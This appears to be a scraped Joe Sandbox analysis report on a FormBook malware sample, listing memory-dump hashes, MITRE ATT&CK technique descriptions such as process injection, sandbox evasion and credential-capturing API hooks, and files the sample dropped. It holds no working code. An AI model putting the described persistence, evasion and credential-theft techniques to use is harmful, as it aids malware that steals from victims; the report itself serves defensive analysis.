Source File: 00000008.00000002.1701027969.00000000031AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_31ad000_tsnokiirph.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: ea6e83620ec6bfba15f6bf475895c77a57be0c6204a8a12c5daaaf1d0365f9ed
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: A711BB79504A80DFCB02CF14D5D4B15FBA1FB88214F28C6AAD8494B6A6C33AD40ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 019ED759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1700140414.00000000019ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 019ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_19ed000_tsnokiirph.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af6a6842e377918c7b47e6b1f8b02accad2040b87e450441573a89aaaa941dc2
Instruction ID: 7c90939a4e9947ef7106021016f9f5b7e2c24b2af2df3cf3edf509420b6a5ad6
Opcode Fuzzy Hash: af6a6842e377918c7b47e6b1f8b02accad2040b87e450441573a89aaaa941dc2
Instruction Fuzzy Hash: C001D0B114538099E7124B69CD88B67FFDCDF45325F18C919ED0D4E246C37AD840C671

Uniqueness

Uniqueness Score: -1.00%

Function 019ED758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1700140414.00000000019ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 019ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_19ed000_tsnokiirph.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97e13d155f35b0f0a17019c8fd953c3f2657d1596cc77bfbbe8510534c3cf260
Instruction ID: e2f8f1a8630f5a8c7959cdc67ed6bf847195d9f959d0b41c393602cdded5fd48
Opcode Fuzzy Hash: 97e13d155f35b0f0a17019c8fd953c3f2657d1596cc77bfbbe8510534c3cf260
Instruction Fuzzy Hash: 28F062714053849EE7118B1ADC88B66FFECEF95625F18C45AED0C4E286C37A9844CAB1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 22#U0415.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\22#U0415.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tsnokiirph.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32tmh1vc.pzb.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cunlwazf.yu4.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jxpq1gou.ssk.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o2v54dpy.txx.psm1

C:\Users\user\AppData\Local\Temp\tmp7F5F.tmp

C:\Users\user\AppData\Local\Temp\tmp8942.tmp

C:\Users\user\AppData\Roaming\tsnokiirph.exe

C:\Users\user\AppData\Roaming\tsnokiirph.exe:Zone.Identifier

Static File Info

Windows Analysis Report
22#U0415.exe